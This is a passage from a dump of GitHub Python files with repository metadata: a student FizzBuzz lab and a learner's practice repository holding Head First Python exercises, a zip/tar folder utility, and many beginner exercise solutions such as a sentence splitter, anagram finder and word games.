"content_id": "90d4674bc169d575cb75e6b3c46d11af02507fd2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 423,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 22,
"path": "/lab_02/fizzbuzz.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "#Eric Dittus and Shanjida Kamal\ndef fizzbuzz(max_value):\n i = 1\n count = 0\n while i <= max_value:\n\n\n if (i % 5 ==0):\n if (i % 3 ==0):\n print (\"FizzBuzz\")\n count == count + 1\n else:\n print ( \"Buzz\")\n elif (i % 3==0):\n print (\"Fizz\")\n \n \n else:\n print (i)\n i=i+1\n \n return count\n \n"
}
] | 31 |
cansley/PythonProjects
|
https://github.com/cansley/PythonProjects
|
9b087a83736fd5fa91cb242205f1147235cbc9b5
|
ba8ccff6f119f13cf927ae32cd4a95070111053d
|
72f80bd49145a864eb1cf2b87c9dd1b8bfdc5e04
|
refs/heads/master
| 2022-11-03T06:23:42.073216 | 2014-10-19T23:57:26 | 2014-10-19T23:57:26 | 25,443,458 | 0 | 1 | null | 2014-10-19T23:33:03 | 2014-10-19T23:39:55 | 2014-10-19T23:57:35 |
Python
|
[
{
"alpha_fraction": 0.5953307151794434,
"alphanum_fraction": 0.6070038676261902,
"avg_line_length": 20.41666603088379,
"blob_id": "6b3bcc249a7d527a04b5d7d8ab972ef109666117",
"content_id": "f83f15257671b2f695831fed26f14d882a5fff95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 257,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 12,
"path": "/HeadFirstPython/setup.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "from distutils.core import setup\n\nsetup(\n name='HeadFirstPython',\n version='.09',\n packages=['Ch1'],\n url='http://www.google.com',\n license='',\n author='Charles Ansley',\n author_email='[email protected]',\n description='Some dumb stuff. DO NOT USE!'\n)\n"
},
{
"alpha_fraction": 0.6133642196655273,
"alphanum_fraction": 0.6230204701423645,
"avg_line_length": 26.25789451599121,
"blob_id": "144929d0b9de372b445b2ccc55473b208bd98a92",
"content_id": "1170e98196ee9ca761b9357629d3159ae1954d99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5178,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 190,
"path": "/PythonChallenges/pyZip.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "\"\"\"\nzip2folder.py by Dirk Krause, [email protected], 12/27/2001\n\nAbstract: A poor man's WinZip\n\nThis program does the three essential tasks that (at least) I need:\n1. Unzip an archive to a folder\n2. Zip a folder to an archive\n3. Zip a (big) file to an archive\n\nFor convenient usage, get Gordon McMillan's Installer Package, and freeze this application with\n> python freeze.py zip2folder.py\nAfter that, you will have a self containing EXE that works even without having python installed.\nDrop this thing into the 'sendto' folder, and you have a very convenient way to use this program\nvia right mouseclick/sendto zip2folder.\n\"\"\"\n\nimport tarfile\nimport zipfile\nimport sys\nimport os\nimport string\n\n\nargument = ''\nif len(sys.argv) > 1:\n argument = sys.argv[1]\nelse:\n print('No argument!')\n\n# argument = r'C:\\Users\\cxa70\\Downloads\\Django-1.6.2.tar.gz'\n\n\nMODE_IS_UNKNOWN = 0\nMODE_IS_FILE = 1\nMODE_IS_ZIPFILE = 2\nMODE_IS_DIRECTORY = 3\nMODE_IS_TAR = 4\n\nclass RecursiveFileIterator:\n # Great script from Daniel Dittmar,\n # http://www.faqts.com/knowledge-base/view.phtml/aid/6000\n def __init__(self, *rootDirs):\n self.dirQueue = list(rootDirs)\n self.includeDirs = None\n self.fileQueue = []\n\n def __getitem__(self, index):\n while len(self.fileQueue) == 0:\n self.nextDir()\n result = self.fileQueue[0]\n del self.fileQueue[0]\n return result\n\n def nextDir(self):\n dir = self.dirQueue[0] # fails with IndexError, which is fine\n # for iterator interface\n del self.dirQueue[0]\n list = os.listdir(dir)\n join = os.path.join\n isdir = os.path.isdir\n for basename in list:\n fullPath = join(dir, basename)\n if isdir(fullPath):\n self.dirQueue.append(fullPath)\n if self.includeDirs:\n self.fileQueue.append(fullPath)\n else:\n self.fileQueue.append(fullPath)\n\n\ndoit = 0\ndo_mode = MODE_IS_UNKNOWN\n\nif os.path.isfile(argument):\n if os.path.splitext(argument)[1].lower() == '.zip':\n do_mode = MODE_IS_ZIPFILE\n elif os.path.splitext(argument)[1].lower() == '.tar':\n do_mode = MODE_IS_TAR\n elif os.path.splitext(argument)[1].lower() == '.gz':\n do_mode = MODE_IS_TAR\n else:\n do_mode = MODE_IS_FILE\nelse:\n do_mode = MODE_IS_UNKNOWN\n\nif os.path.isdir(argument):\n do_mode = MODE_IS_DIRECTORY\n\nif do_mode == MODE_IS_FILE:\n print('converting file %s to zip?' % argument)\n\nif do_mode == MODE_IS_ZIPFILE:\n print('converting zipfile %s to folder?' % argument)\n\nif do_mode == MODE_IS_DIRECTORY:\n print('converting directory %s to zipfile?' % argument)\n\nif do_mode == MODE_IS_TAR:\n print('converting tarfile %s to folder?' % argument)\n\nif do_mode in (MODE_IS_FILE, MODE_IS_ZIPFILE, MODE_IS_DIRECTORY, MODE_IS_TAR):\n # comment the following line to not have to confirm\n if input('[y/n]')[0] in 'yY':\n doit = -1\n\nif do_mode == MODE_IS_UNKNOWN:\n print('%s is not a file.' % argument)\n\nif doit == -1:\n print('ok, doing it.')\nelse:\n print('exiting.')\n\nif doit == -1 and do_mode == MODE_IS_ZIPFILE:\n zipfilename = argument\n\n zipdir = os.path.splitext(zipfilename)[0] + '/'\n\n # if you want the folder to be cleared before unzipping,\n # uncomment the following lines:\n\n #try:\n # shutil.rmtree(zipdir)\n # print 'Deleted',zipdir\n #except: pass\n\n\n zipdir = os.path.splitext(zipfilename)[0] + '/'\n\n file = zipfile.ZipFile(zipfilename, \"r\")\n print\n 'Number of files', len(file.infolist())\n for zfile in file.infolist():\n #print '--------------File:',\n #print zfile.filename, zfile.date_time, zfile.file_size, zfile.compress_size\n dirname = zipdir + os.path.dirname(zfile.filename)\n\n try:\n os.makedirs(dirname)\n except:\n pass\n\n if zfile.file_size > 0:\n temp = file.read(zfile.filename)\n # print temp\n fname = zipdir + zfile.filename\n print\n fname\n f = open(fname, \"wb\").write(temp)\n\nif doit == -1 and do_mode == MODE_IS_TAR:\n tarFileName = argument\n\n tarDir = os.path.splitext(tarFileName)[0] + '/'\n\n # if you want the folder to be cleared before unzipping,\n # uncomment the following lines:\n\n #try:\n # shutil.rmtree(zipdir)\n # print 'Deleted',zipdir\n #except: pass\n\n with tarfile.open(tarFileName, \"r\") as tar:\n tar.extractall(tarDir)\n\nif doit == -1 and do_mode == MODE_IS_DIRECTORY:\n directory = argument\n\n print\n 'directory', os.path.abspath(directory)\n\n file = zipfile.ZipFile(os.path.abspath(directory) + \".zip\", \"w\")\n\n for name in RecursiveFileIterator(directory):\n print\n 'try', name\n if os.path.isfile(name):\n file.write(name, name, zipfile.ZIP_DEFLATED)\n\n file.close()\n\nif doit == -1 and do_mode == MODE_IS_FILE:\n file = zipfile.ZipFile(os.path.abspath(argument) + \".zip\", \"w\")\n file.write(argument, argument, zipfile.ZIP_DEFLATED)\n file.close()\n\n# comment the following line to have the dos box disappear immediately\ninp = input('<... press the anykey key.>')"
},
{
"alpha_fraction": 0.6434856653213501,
"alphanum_fraction": 0.6498932242393494,
"avg_line_length": 40.36042404174805,
"blob_id": "f6a6f1afec8a0ca94fbce25d04df6b1f741b0136",
"content_id": "2f9a8268ee5c07d85865ff0714f28abc609a0469",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11705,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 283,
"path": "/PythonExercises/harder.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "import re\nfrom pprint import pprint as pp\nimport random\n\n# A sentence splitter is a program capable of splitting a text into sentences. The standard set of heuristics for\n# sentence splitting includes (but isn't limited to) the following rules:\n#\n# Sentence boundaries occur at one of \".\" (periods), \"?\" or \"!\", except that\n#\n# Periods followed by whitespace followed by a lower case letter are not sentence boundaries.\n# Periods followed by a digit with no intervening whitespace are not sentence boundaries.\n# Periods followed by whitespace and then an upper case letter, but preceded by any of a short list of titles are not\n# sentence boundaries. Sample titles include Mr., Mrs., Dr., and so on.\n# Periods internal to a sequence of letters with no adjacent whitespace are not sentence boundaries (for example,\n# www.aptex.com, or e.g).\n# Periods followed by certain kinds of punctuation (notably comma and more periods) are probably not sentence boundaries\n# .\n# Your task here is to write a program that given the name of a text file is able to write its content with each\n# sentence on a separate line. Test your program with the following short text:\n# Mr. Smith bought cheapsite.com for 1.5 million dollars, i.e. he paid a lot for it. Did he mind? Adam Jones Jr. thinks\n# he didn't. In any case, this isn't true... Well, with a probability of .9 it isn't.\n#\n# The result should be:\n#\n# Mr. Smith bought cheapsite.com for 1.5 million dollars, i.e. he paid a lot for it.\n# Did he mind?\n# Adam Jones Jr. thinks he didn't.\n# In any case, this isn't true...\n# Well, with a probability of .9 it isn't.\ndef text_splitter(file_path, file_content):\n file_content = str(file_content)\n digits = range(0, 9)\n titles = [\"Mr.\", \"Ms.\", \"Mrs.\", \"Jr.\", \"Dr.\"]\n consenants = re.compile(\"[a-z]\", re.IGNORECASE)\n line_break_idx = []\n segments = []\n idx = 0\n while idx != -1:\n idx = file_content.find(\"?\", idx + 1)\n if idx != -1:\n line_break_idx.append(idx)\n\n idx = 0\n while idx != -1:\n idx = file_content.find(\"!\", idx + 1)\n if idx != -1:\n line_break_idx.append(idx)\n\n idx = 0\n while idx != -1:\n idx = file_content.find(\".\", idx + 1)\n if idx != -1:\n if idx == len(file_content) - 1:\n idx = -1\n continue\n if file_content[idx - 2: idx + 1] in titles or file_content[idx - 3:idx + 1] in titles:\n continue\n if (file_content[idx - 1] in digits or file_content[idx - 1] == \" \") and file_content[idx + 1] in digits:\n continue\n if consenants.match(file_content[idx - 1]) and file_content[idx - 2] == \".\":\n continue\n if file_content[idx + 1] == \" \" and consenants.match(file_content[idx + 2]):\n line_break_idx.append(idx)\n last_idx = 0\n for x in sorted(line_break_idx):\n segments.append((last_idx, x + 2))\n last_idx = x + 2\n\n with open(file_path, \"w+\") as f:\n for x in segments:\n f.write(file_content[x[0]: x[1]] + \"\\n\")\n f.write(file_content[last_idx:])\n\n\n# An anagram is a type of word play, the result of rearranging the letters of a word or phrase to produce a new word or\n# phrase, using all the original letters exactly once; e.g., orchestra = carthorse. Using the word list at\n# http://www.puzzlers.org/pub/wordlists/unixdict.txt, write a program that finds the sets of words that share the same\n# characters that contain the most words in them.\nclass dictionary_word(object):\n def __init__(self):\n self.Value = \"\"\n self.Length = 0\n self.CharList = []\n\n def populate(self, source: str):\n self.Value = source\n self.Length = len(source)\n self.CharList = sorted(source)\n return self\n\n def isAnagram(self, comparator):\n return self.Length == comparator.Length and self.Value != comparator.Value and self.CharList == comparator.CharList\n\n\ndef find_anagrams(word_list_file):\n master_word_list = []\n with open(word_list_file) as f:\n for line in f:\n newWord = dictionary_word().populate(line.replace(\"\\n\", \"\").lower())\n master_word_list.append(newWord)\n # master_word_list = list(map(lambda x: dictionary_word().populate(x.replace(\"\\n\", \"\").lower()), f))\n\n master_anagram_list = []\n while len(master_word_list) > 0:\n word = master_word_list.pop()\n anagram_list = [word.Value]\n filter_list = list(\n filter(lambda n: word.Length == n.Length and word.Value != n.Value and word.CharList == n.CharList,\n master_word_list))\n anagram_list.extend(map(lambda z: z.Value, filter_list))\n for zed in filter_list:\n if zed in master_word_list:\n master_word_list.remove(zed)\n master_anagram_list.append(anagram_list)\n master_anagram_list = sorted(master_anagram_list, key=len)\n max_len = len(master_anagram_list[-1])\n pp(list(filter(lambda x: len(x) == max_len, master_anagram_list)))\n\n\n# Your task in this exercise is as follows:\n#\n# Generate a string with N opening brackets (\"[\") and N closing brackets (\"]\"), in some arbitrary order.\n# Determine whether the generated string is balanced; that is, whether it consists entirely of pairs of opening/closing\n# brackets (in that order), none of which mis-nest.\n# Examples:\n#\n# [] OK ][ NOT OK\n# [][] OK ][][ NOT OK\n# [[][]] OK []][[] NOT OK\ndef bracket_string_generator(bracket_count):\n ret_string = \"\"\n bracket_array = [\"[\", \"]\"]\n for i in range(0, bracket_count):\n rnd_num = random.randint(1, 10000) % 2\n ret_string += bracket_array[rnd_num]\n return ret_string\n\n\ndef bracket_string_analyser(string_to_eval):\n pp(\"Analysing string: \" + string_to_eval)\n is_balanced = True\n bal_count = 0\n for c in string_to_eval:\n if c == \"[\":\n bal_count += 1\n if c == \"]\":\n bal_count -= 1\n if bal_count < 0:\n is_balanced = False\n break\n is_balanced = bal_count == 0\n pp(\"String is balanced? \" + str(is_balanced))\n\n\n#A certain childrens game involves starting with a word in a particular category. Each participant in turn says a word,\n# but that word must begin with the final letter of the previous word. Once a word has been given, it cannot be repeated\n# . If an opponent cannot give a word in the category, they fall out of the game. For example, with \"animals\" as the\n# category,\n#\n# Child 1: dog\n# Child 2: goldfish\n# Child 1: hippopotamus\n# Child 2: snake\n# ...\n# Your task in this exercise is as follows: Take the following selection of 70 English Pokemon names (extracted from\n# Wikipedia's list of Pokemon) and generate the/a sequence with the highest possible number of Pokemon names where the\n# subsequent name starts with the final letter of the preceding name. No Pokemon name is to be repeated.\n#\n# audino bagon baltoy banette bidoof braviary bronzor carracosta charmeleon\n# cresselia croagunk darmanitan deino emboar emolga exeggcute gabite\n# girafarig gulpin haxorus heatmor heatran ivysaur jellicent jumpluff kangaskhan\n# kricketune landorus ledyba loudred lumineon lunatone machamp magnezone mamoswine\n# nosepass petilil pidgeotto pikachu pinsir poliwrath poochyena porygon2\n# porygonz registeel relicanth remoraid rufflet sableye scolipede scrafty seaking\n# sealeo silcoon simisear snivy snorlax spoink starly tirtouga trapinch treecko\n# tyrogue vigoroth vulpix wailord wartortle whismur wingull yamask\ndef build_list(string_to_parse):\n return list(str(string_to_parse).split())\n\n\ndef add_to_dict(value_to_add, dict):\n dict.setdefault(value_to_add, 0)\n dict[value_to_add] += 1\n\n\ndef word_starts_with(letter, word_list):\n return list(filter(lambda x: x[0] == letter, word_list))\n\n\ndef word_ends_with(letter, word_list):\n return list(filter(lambda x: x[-1] == letter, word_list))\n\n\ndef sort_list_by_freq(freq_list, target_list):\n cross_sorted_list = []\n for l in freq_list:\n x = word_ends_with(l, target_list)\n cross_sorted_list.extend(x)\n for z in x:\n target_list.remove(z)\n for z in target_list:\n cross_sorted_list.append(z)\n return cross_sorted_list\n\n\ndef build_sub_list(current_word, master_list):\n max_list, series = [], []\n series.append(current_word)\n work_list = master_list[:]\n if current_word in work_list:\n work_list.remove(current_word)\n inner_list = word_starts_with(current_word[-1], work_list)\n for w in inner_list:\n series.extend(build_sub_list(w, work_list))\n if len(series) > len(max_list):\n max_list = series[:]\n series = [current_word]\n if len(series) > len(max_list): # this needs to be here to catch items with no inner_list results\n max_list = series[:]\n return max_list\n\n\ndef words_domino():\n word_list = build_list(\n \"audino bagon baltoy banette bidoof braviary bronzor carracosta charmeleon cresselia croagunk\"\n \" darmanitan deino emboar emolga exeggcute gabite girafarig gulpin haxorus heatmor heatran\"\n \" ivysaur jellicent jumpluff kangaskhan kricketune landorus ledyba loudred lumineon lunatone\"\n \" machamp magnezone mamoswine nosepass petilil pidgeotto pikachu pinsir poliwrath poochyena\"\n \" porygon2 porygonz registeel relicanth remoraid rufflet sableye scolipede scrafty \"\n \" sealeo silcoon simisear snivy snorlax spoink starly tirtouga trapinch treecko tyrogue\"\n \" vigoroth vulpix wailord wartortle whismur wingull yamask\")\n\n max_list, series = [], []\n for word in word_list:\n current_word = word\n work_list = word_list[:]\n work_list.remove(current_word)\n series = build_sub_list(current_word, work_list)\n if len(series) > len(max_list):\n max_list = series[:]\n\n pp(max_list)\n\n\n#An alternade is a word in which its letters, taken alternatively in a strict sequence, and used in the same order as\n# the original word, make up at least two other words. All letters must be used, but the smaller words are not\n# necessarily of the same length. For example, a word with seven letters where every second letter is used will produce\n# a four-letter word and a three-letter word. Here are two examples:\n#\n# \"board\": makes \"bad\" and \"or\".\n# \"waists\": makes \"wit\" and \"ass\".\n# Using the word list at http://www.puzzlers.org/pub/wordlists/unixdict.txt, write a program that goes through each word\n# in the list and tries to make two smaller words using every second letter. The smaller words must also be members of\n# the list. Print the words to the screen in the above fashion.\ndef get_even_odd_words(word, starting_pos, lookup_list):\n output = \"\"\n for x in range(starting_pos, len(word), 2):\n output += word[x]\n\n if len(output) >= 2 and output in lookup_list:\n return output\n else:\n return \"\"\n\n\ndef find_alternades():\n with open('unixdict.txt', mode='r') as file:\n word_list = []\n for line in file:\n word_list.append(line.replace('\\n', ''))\n\n for word in word_list:\n odd_letters = get_even_odd_words(word, 1, word_list)\n even_letters = get_even_odd_words(word, 0, word_list)\n\n if len(even_letters) > 0 or len(odd_letters) > 0:\n if len(even_letters) == 0:\n message = '\"%s\": makes \"%s\".' % (word, odd_letters)\n elif len(odd_letters) == 0:\n message = '\"%s\": makes \"%s\".' % (word, even_letters)\n else:\n message = '\"%s\": makes \"%s\" and \"%s\".' % (word, even_letters, odd_letters)\n pp(message)\n"
},
{
"alpha_fraction": 0.5876288414001465,
"alphanum_fraction": 0.5935198664665222,
"avg_line_length": 23.25,
"blob_id": "533c712813e98d7e526cabb38a6c3f384dd54d5d",
"content_id": "2e1c285e66a8208a0f8e817d22381f89665f603e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 679,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 28,
"path": "/MyFirstPython/words.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "\"\"\"Module Level Documentation\n\nUsage:\n How to use this...\n\n\"\"\"\n__author__ = 'cxa70'\n\nfrom urllib.request import urlopen\n\ndef fetch_words():\n '''Retrieves a list of words from a URL.\n\n Args:\n url: The URL of a UTF-8 text document.\n\n Returns:\n A list of strings containing the words from the document.\n '''\n with urlopen('http://sixty-north.com/c/t.txt') as story:\n story_words = []\n for line in story:\n line_words = line.decode('utf-8').split()\n for word in line_words:\n story_words.append(word)\n\n for word in story_words:\n print(word) # This is a line comment...use these sparingly...\n"
},
{
"alpha_fraction": 0.5850515365600586,
"alphanum_fraction": 0.6092783212661743,
"avg_line_length": 28.409090042114258,
"blob_id": "192c307df92d7f22bd776e05785cea4f3e07f1ba",
"content_id": "644ebd0e387ee2a1c53191dbfbd58a3452793301",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1940,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 66,
"path": "/HeadFirstPython/Ch1/Ch1.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\n\nmovies = [\"The Holy Grail\", \"The Life of Brian\", \"The Meaning of Life\"]\n\n#exercise 1\n# this is really beyond what the book called for.\n# the book was just looking for movies.insert(1, 1975), etc.\ndef upsert_year(movie_title, year, movie_collection):\n return_coll = movie_collection[:]\n if movie_title in return_coll:\n title_idx = return_coll.index(movie_title)\n else:\n return_coll.append(movie_title)\n title_idx = return_coll.index(movie_title)\n\n if title_idx+1 < len(return_coll):\n test_val = return_coll[title_idx+1]\n else:\n test_val = None\n\n if isinstance(test_val, int):\n if title_idx+1 >= len(return_coll):\n return_coll.append(year)\n else:\n return_coll[title_idx+1] = year\n else:\n return_coll.insert(title_idx+1, year)\n return return_coll\n\n\n#exercise 2\ndef create_list():\n return [\"The Holy Grail\", 1975, \"The Life of Brian\", 1979, \"The Meaning of Life\", 1983]\n\n\ndef create_complex_list():\n return [\"The Holy Grail\", 1975, \"Terry Jones & Terry Gilliam\", 91, [\"Graham Chapman\", [\"Michael Palin\", \"John Cleese\", \"Terry Gilliam\", \"Eric Idle\", \"Terry Jones\"]]]\n\n\ndef print_list(indent_string, val_list):\n currentList = list(val_list)\n for val in currentList:\n if isinstance(val, list):\n print_list(indent_string*2, val)\n else:\n print(indent_string, val)\n\n\ndef main():\n newMovies = upsert_year(\"The Holy Grail\", 1975, movies)\n newMovies = upsert_year(\"The Life of Brian\", 1979, newMovies)\n newMovies = upsert_year(\"The Meaning of Life\", 1983, newMovies)\n print(newMovies)\n\n newMovies = create_list()\n count = 0\n while count < len(newMovies):\n print(newMovies[count])\n count += 2\n\n newMovies = create_complex_list()\n for movie in newMovies:\n if isinstance(movie, str):\n print(movie)\n elif isinstance(movie, list):\n print_list(\"-->\", movie)"
},
{
"alpha_fraction": 0.6013533473014832,
"alphanum_fraction": 0.6701971292495728,
"avg_line_length": 35.956520080566406,
"blob_id": "167872e9536687f28b284738d244bab572f7ee0d",
"content_id": "0b0a961646e7532b7eaba5bb93eaa94a23a6018c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3399,
"license_type": "no_license",
"max_line_length": 231,
"num_lines": 92,
"path": "/PythonExercises/main.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "__author__ = 'cxa70'\nimport time\nfrom pprint import pprint as pp\n\n# region Very Simple Exercises\n# from verysimpleexercises import *\n# print(max(12, 24))\n# print(maxofthree(3, 1, 7))\n# print(length(\"my test string\"))\n# print(length([12, 234, 6345, 234213, 23452345, 234, 123]))\n# print(length({(12, 45), (234,45), (1.234535, 2345)}))\n# print(isvowel(\"a\"))\n# print(isvowel(\"apple\"))\n# print(isvowel(234))\n# print(isvowel([1,23,4,56345]))\n# print(translate(\"this is fun\"))\n# print(sum([1,2,3,4]))\n# print(multiply([1,2,3,4]))\n# print(reverse(\"I am testing\"))\n# print(is_palindrome(\"patsy\"))\n# print(is_palindrome(\"bob\"))\n# print(is_palindrome(\"radar\"))\n# print(is_member(\"x\", \"test value\"))\n# print(is_member(\"x\", [12, 234, 3452346, \"123\", \"x\"]))\n# print(overlapping([1,2,3,4,5,6],[7,8,9,10,11,12]))\n# print(overlapping([1,2,3,4,5,6],[7,8,9,10,11,12,1]))\n# print(generate_n_chars('x', 10))\n# print(generate_n_chars('xz', 15))\n# historgram([3, 2, 6])\n# historgram([4,9,7])\n# print(max_in_list([123,4,56,2,3,4,5,6,23,23456,2356,346,3467,7,7,48,48,6,2345,2345,2345,23,45,7,47,3456,48,58,7,234,5,2347]))\n# print(map_lengths([\"test\",\"one\",\"fallow\"]))\n# print(find_longest_word([\"apple\",\"bottom\",\"jeans\",\"supercalifragilistic\"]))\n# print(filter_long_words(['foo', 'bang','crash'], 3))\n# print(is_palindrome_phrase(\"Was it a rat I saw?\"))\n# print(is_palindrome_phrase(\"Tango Charlie\"))\n# print(is_pangram(\"The quick brown fox jumps over the lazy dog\"))\n# print(is_pangram(\"The buick brown fox jumps over the lazy dog\"))\n# print(get_99btls_lyrics(99))\n# print(translate_swede(\"Merry Christmas\"))\n# pprint.pprint(char_freq(\"The buick brown fox jumps over the lazy dog\"))\n# print(caesar_cipher(\"Pnrfne pvcure? V zhpu cersre Pnrfne fnynq!\"))\n# print(correct(\"This is very funny and cool.Indeed!\"))\n# print(make_3sg_form(\"run\"))\n# print(make_3sg_form(\"carry\"))\n# print(make_3sg_form(\"coach\"))\n# print(make_ing_form(\"run\"))\n# print(make_ing_form(\"carry\"))\n# print(make_ing_form(\"be\"))\n# print(make_ing_form(\"see\"))\n# print(make_ing_form(\"travel\"))\n# print(make_ing_form(\"boogie\"))\n# endregion\n\n#region Higher Order Functions and list comprehensions\n# from highorderfunctions import *\n#\n# pp(max_in_list([1, 2342, 3, 4, 5, 6]))\n# pp(map_words(['test', 'other', 'words']))\n# pp(find_longest_word([\"this\", \"this is a test\", \"TheOther\"]))\n# pp(filter_long_words([\"test1\", \"test of another word\", \"the\"], 5))\n# pp(translate([\"merry\", 'christmas', 'and', 'happy', 'new', 'year']))\n#endregion\n\n#region Simple IO exercises\nfrom simpleIO import *\n\n# print_palindromes('testfile.txt')\n# pp(find_semordnilaps('testwordlist.txt'))\n# pp(\"Characters sorted by frequency:\")\n# pp(char_freq_table('testfile.txt', 1))\n# pp(\"Characters sorted by character:\")\n# pp(char_freq_table('testfile.txt', 0))\n# speak_ICAO(\"this is a test\", 0, 1)\n# pp(get_hapaxes(\"testfile.txt\"))\n# pp(number_lines(\"testfile.txt\", \"newfile.txt\"))\n# pp(get_avg_word_len(\"testwordlist.txt\"))\n# guess_number_game()\n# guess_word_game()\n# lingo()\n#endregion\n\n#region Harder Exercises\nfrom harder import *\n\n\n# text_splitter(\"splitText.txt\", \"Mr. Smith bought cheapsite.com for 1.5 million dollars, i.e. he paid a lot for it. Did he mind? Adam Jones Jr. thinks he didn't. In any case, this isn't true... Well, with a probability of .9 it isn't.\")\n# find_anagrams(\"unixdict.txt\")\n# bracket_string_analyser(bracket_string_generator(10)))\n# words_domino()\nfind_alternades()\n#endregion"
},
{
"alpha_fraction": 0.6293017268180847,
"alphanum_fraction": 0.6365129351615906,
"avg_line_length": 41.31721878051758,
"blob_id": "223635b02ecfd551f6de43dbf0dc265fd7212ccc",
"content_id": "61a7fd7dcccd96e0a3447701c9c66f1bbad5f37e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14010,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 331,
"path": "/PythonExercises/verysimpleexercises.py",
"repo_name": "cansley/PythonProjects",
"src_encoding": "UTF-8",
"text": "# these exercises come from the web page: http://www.ling.gu.se/~lager/python_exercises.html\nimport re\n# 1 define a function max() that takes two numbers and returns the largest of them.\n# Use the if-then-else construct available in Python.\n# (Its true that Python has the max() function built in, but writing it yourself is nevertheless a good exercise.)\n\n\ndef max(num1, num2):\n if num1 > num2:\n return num1\n elif num2 > num1:\n return num2\n else:\n raise ValueError(\"Values cannot be equal.\")\n\n\n# Define a function max_of_three() that takes three numbers as arguments and returns the largest of them.\ndef maxofthree(num1, num2, num3):\n return max(max(num1, num2), num3)\n\n\n# Define a function that computes the length of a given list or string.\n# (It is true that Python has the len() function built in, but writing it yourself is nevertheless a good exercise.)\ndef length(obj):\n count = 0\n for x in obj:\n count += 1\n\n return count\n\n\n# Write a function that takes a character (i.e. a string of length 1) and returns True if it is a vowel, False otherwise.\ndef isvowel(value):\n vowels = [\"a\", \"e\", \"i\", \"o\", \"u\"]\n\n if str.isalpha(str(value)) and len(value) == 1 and str.lower(value) in vowels:\n return True\n else:\n return False\n\n\n# Write a function translate() that will translate a text into \"rövarspråket\" (Swedish for \"robber's language\").\n# That is, double every consonant and place an occurrence of \"o\" in between. For example, translate(\"this is fun\")\n# should return the string \"tothohisos isos fofunon\".\ndef translate(value):\n result = \"\"\n for c in value:\n if not isvowel(c) and not str.isspace(c):\n result += c + \"o\" + c\n else:\n result += c\n return result\n\n\n# Define a function sum() and a function multiply() that sums and multiplies (respectively) all the numbers\n# in a list of numbers.\n# For example, sum([1, 2, 3, 4]) should return 10, and multiply([1, 2, 3, 4]) should return 24.\ndef sum(numlist):\n value = 0\n for x in numlist:\n value += x\n return value\n\n\ndef multiply(numlist):\n value = 1\n for x in numlist:\n value *= x\n return value\n\n\n# Define a function reverse() that computes the reversal of a string.\n# For example, reverse(\"I am testing\") should return the string \"gnitset ma I\".\ndef reverse(string):\n value = \"\"\n for x in range(1, len(string) + 1):\n value += string[x * (-1)]\n return value\n\n\n# Define a function is_palindrome() that recognizes palindromes (i.e. words that look the same written backwards).\n# For example, is_palindrome(\"radar\") should return True.\ndef is_palindrome(string):\n return string == reverse(string)\n\n\n# Write a function is_member() that takes a value (i.e. a number, string, etc) x and a list of values a,\n# and returns True if x is a member of a, False otherwise. (Note that this is exactly what the in operator does,\n# but for the sake of the exercise you should pretend Python did not have this operator.)\ndef is_member(value, list):\n for x in list:\n if value == x:\n return True\n return False\n\n\n# Define a function overlapping() that takes two lists and returns True if they have at least one member in common,\n# False otherwise. You may use your is_member() function, or the in operator, but for the sake of the exercise,\n# you should (also) write it using two nested for-loops.\ndef overlapping(list1, list2):\n for x in list1:\n for y in list2:\n if x == y:\n return True\n return False\n\n\n# Define a function generate_n_chars() that takes an integer n and a character c and returns a string, n characters long,\n# consisting only of c:s. For example, generate_n_chars(5,\"x\") should return the string \"xxxxx\".\n# (Python is unusual in that you can actually write an expression 5 * \"x\" that will evaluate to \"xxxxx\".\n# For the sake of the exercise you should ignore that the problem can be solved in this manner.)\ndef generate_n_chars(char, count):\n result = \"\"\n for x in range(count):\n result += str(char)\n return result\n\n\n# Define a procedure histogram() that takes a list of integers and prints a histogram to the screen.\n# For example, histogram([4, 9, 7]) should print the following:\n# ****\n# *********\n# *******\ndef historgram(list1):\n for x in list1:\n print(generate_n_chars(\"*\", x))\n\n\n# The function max() from exercise 1) and the function max_of_three() from exercise 2) will only work for two and three\n# numbers, respectively. But suppose we have a much larger number of numbers, or suppose we cannot tell in advance how\n# many they are? Write a function max_in_list() that takes a list of numbers and returns the largest one.\ndef max_in_list(list):\n if len(list) > 2:\n val = None\n for x in range(len(list)):\n val = max_in_list([list[x], val])\n return val\n else:\n if list[1] is None or list[0] > list[1]:\n return list[0]\n else:\n return list[1]\n\n\n# Write a program that maps a list of words into a list of integers representing the lengths of the correponding words.\ndef map_lengths(wordlist):\n lengths = []\n for x in wordlist:\n lengths.append(len(x))\n return lengths\n\n\n# Write a function find_longest_word() that takes a list of words and returns the length of the longest one.\ndef find_longest_word(wordlist):\n lengths = map_lengths(wordlist)\n longestIdx = lengths.index(max_in_list(lengths))\n return wordlist[longestIdx]\n\n\n# Write a function filter_long_words() that takes a list of words and an integer n and returns the list of words that are longer than n.\ndef filter_long_words(wordlist, maxlength):\n return list(filter(lambda x: len(x) > 